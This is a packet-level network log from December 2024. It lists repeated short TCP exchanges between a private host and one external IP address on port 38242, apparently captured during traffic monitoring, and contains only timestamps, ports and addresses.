Dec 24, 2024 05:58:09.472362995 CET	38216	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:09.848449945 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:09.968209028 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:09.968283892 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:09.968319893 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:10.088340998 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:10.481666088 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:10.645112991 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:11.109685898 CET	38242	38218	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:11.109759092 CET	38218	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:11.482722998 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:11.602488995 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:11.602555990 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:11.602581978 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:11.722156048 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:12.106584072 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:12.269085884 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:12.721926928 CET	38242	38220	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:12.721999884 CET	38220	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:13.107636929 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:13.227298021 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:13.227370024 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:13.227395058 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:13.348169088 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:13.731061935 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:13.893150091 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:14.348186016 CET	38242	38222	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:14.348254919 CET	38222	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:14.732044935 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:14.851833105 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:14.851926088 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:14.851927042 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:14.971541882 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:15.356131077 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:15.521286011 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:15.979736090 CET	38242	38224	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:15.979818106 CET	38224	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:16.357223034 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:16.476910114 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:16.476979971 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:16.476980925 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:16.596642971 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:16.980789900 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:17.145237923 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:17.600792885 CET	38242	38226	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:17.600874901 CET	38226	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:17.982506990 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:18.102263927 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:18.102320910 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:18.102340937 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:18.221880913 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:18.606460094 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:18.769205093 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:19.224616051 CET	38242	38228	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:19.224680901 CET	38228	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:19.607539892 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:19.727262974 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:19.727330923 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:19.727399111 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:19.847152948 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:20.230962038 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:20.393263102 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:20.845418930 CET	38242	38230	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:20.845477104 CET	38230	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:21.232317924 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:21.352044106 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:21.352133989 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:21.352188110 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:21.471807003 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:21.857846022 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:22.021205902 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:22.468012094 CET	38242	38232	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:22.468101978 CET	38232	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:22.858946085 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:22.978691101 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:22.978771925 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:22.978771925 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:23.098515034 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:23.482660055 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:23.645246983 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:24.109158993 CET	38242	38234	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:24.109347105 CET	38234	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:24.483763933 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:24.603430033 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:24.603483915 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:24.603503942 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:24.723124027 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:25.107081890 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:25.269218922 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:25.740921974 CET	38242	38236	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:25.740983963 CET	38236	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:26.108154058 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:26.227798939 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:26.227859974 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:26.227879047 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:26.347503901 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:26.732973099 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:26.897298098 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:27.356611013 CET	38242	38238	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:27.356689930 CET	38238	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:27.734663010 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:27.854286909 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:27.854362965 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:27.854413033 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:27.973993063 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:28.358544111 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:28.521449089 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:28.984230995 CET	38242	38240	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:28.984314919 CET	38240	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:29.359452963 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:29.479226112 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:29.479321003 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:29.479336977 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:29.598913908 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:29.982686996 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:30.145451069 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:30.591886044 CET	38242	38244	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:30.592082024 CET	38244	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:30.983608961 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:31.103385925 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:31.103475094 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:31.103504896 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:31.223943949 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:31.607037067 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:31.769344091 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:32.233905077 CET	38242	38246	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:32.234139919 CET	38246	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:32.608622074 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:32.728391886 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:32.728475094 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:32.728663921 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:32.848145962 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:33.233975887 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:33.397444010 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:33.848515987 CET	38242	38248	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:33.848603010 CET	38248	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:34.234976053 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:34.354671955 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:34.354765892 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:34.354765892 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:34.474394083 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:34.859561920 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:35.021482944 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:35.488866091 CET	38242	38250	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:35.489089012 CET	38250	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:35.860666037 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:35.980259895 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:35.980422974 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:35.980422974 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:36.100107908 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:36.483299971 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:36.649487019 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:37.115494013 CET	38242	38252	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:37.115567923 CET	38252	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:37.484071970 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:37.603708029 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:37.603786945 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:37.603807926 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:37.724030972 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:38.106777906 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:38.269397974 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:38.724891901 CET	38242	38254	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:38.724957943 CET	38254	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:39.107589006 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:39.227226019 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:39.227289915 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:39.227333069 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:39.347110987 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:39.730475903 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:39.893402100 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:40.362575054 CET	38242	38256	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:40.362643957 CET	38256	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:40.731153965 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:40.850992918 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:40.851062059 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:40.851083040 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:40.970721960 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:41.353591919 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:41.513408899 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:41.970860004 CET	38242	38258	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:41.970930099 CET	38258	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:42.354337931 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:42.474081039 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:42.474165916 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:42.474165916 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:42.593794107 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:42.977188110 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:43.141491890 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:43.627159119 CET	38242	38260	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:43.627273083 CET	38260	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:43.978135109 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:44.097840071 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:44.097948074 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:44.097964048 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:44.217747927 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:44.600837946 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:44.765412092 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:45.224381924 CET	38242	38262	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:45.224509001 CET	38262	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:45.601670980 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:45.721369028 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:45.721427917 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:45.721457005 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:45.841059923 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:46.224148035 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:46.385385036 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:46.843533993 CET	38242	38264	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:46.843588114 CET	38264	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:47.224912882 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:47.344651937 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:47.344702005 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:47.344717979 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:47.464515924 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:47.847465038 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:48.013437033 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:48.460728884 CET	38242	38266	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:48.460808039 CET	38266	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:48.848210096 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:48.967976093 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:48.968125105 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:48.968125105 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:49.087821960 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:49.470820904 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:49.633555889 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:50.104969978 CET	38242	38268	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:50.105099916 CET	38268	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:50.471910000 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:50.591654062 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:50.591926098 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:50.591984987 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:50.713484049 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:51.096662998 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:51.257525921 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:51.715986013 CET	38242	38270	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:51.716213942 CET	38270	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:52.097959995 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:52.217639923 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:52.217724085 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:52.217753887 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:52.337410927 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:52.721690893 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:52.886542082 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:53.367237091 CET	38242	38272	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:53.367341995 CET	38272	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:53.722889900 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:53.844168901 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:53.844247103 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:53.844300985 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:53.963944912 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:54.349040031 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:54.513577938 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:54.959124088 CET	38242	38274	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:54.959265947 CET	38274	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:55.350498915 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:55.470171928 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:55.470276117 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:55.470328093 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:55.589929104 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:55.975581884 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:56.137635946 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:56.592305899 CET	38242	38276	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:56.592534065 CET	38276	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:56.976507902 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:57.096179008 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:57.096261024 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:57.096261024 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:57.215949059 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:57.600074053 CET	38278	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:57.761600971 CET	38242	38278	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:58.601557970 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:58.721261978 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:58.721339941 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:58.721395969 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:58.840945005 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:59.226583958 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:58:59.394313097 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:59.834644079 CET	38242	38280	94.156.227.234	192.168.2.15
Dec 24, 2024 05:58:59.834729910 CET	38280	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:00.227999926 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:00.347681046 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:00.347810030 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:00.347878933 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:00.467408895 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:00.852929115 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:01.018701077 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:01.472695112 CET	38242	38282	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:01.472767115 CET	38282	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:01.854422092 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:01.974153042 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:01.974250078 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:01.974420071 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:02.093883991 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:02.479792118 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:02.864649057 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:03.033689022 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:03.095896006 CET	38242	38284	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:03.095993042 CET	38284	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:03.481266022 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:03.726320028 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:03.726563931 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:03.726603031 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:03.846405983 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:04.231610060 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:04.397535086 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:04.859661102 CET	38242	38286	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:04.859849930 CET	38286	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:05.233047009 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:05.352729082 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:05.352829933 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:05.352997065 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:05.472484112 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:05.858115911 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:06.021533012 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:06.482374907 CET	38242	38288	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:06.482467890 CET	38288	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:06.859489918 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:06.979104042 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:06.979218006 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:06.979264975 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:07.099179029 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:07.485080957 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:07.645647049 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:08.101227999 CET	38242	38290	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:08.101392984 CET	38290	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:08.486047983 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:08.605710983 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:08.605784893 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:08.605947971 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:08.725436926 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:09.110663891 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:09.488395929 CET	38292	38242	192.168.2.15	94.156.227.234
Dec 24, 2024 05:59:09.706244946 CET	38242	38292	94.156.227.234	192.168.2.15
Dec 24, 2024 05:59:09.706705093 CET	38242	38292	94.156.227.234	192.168.2.15
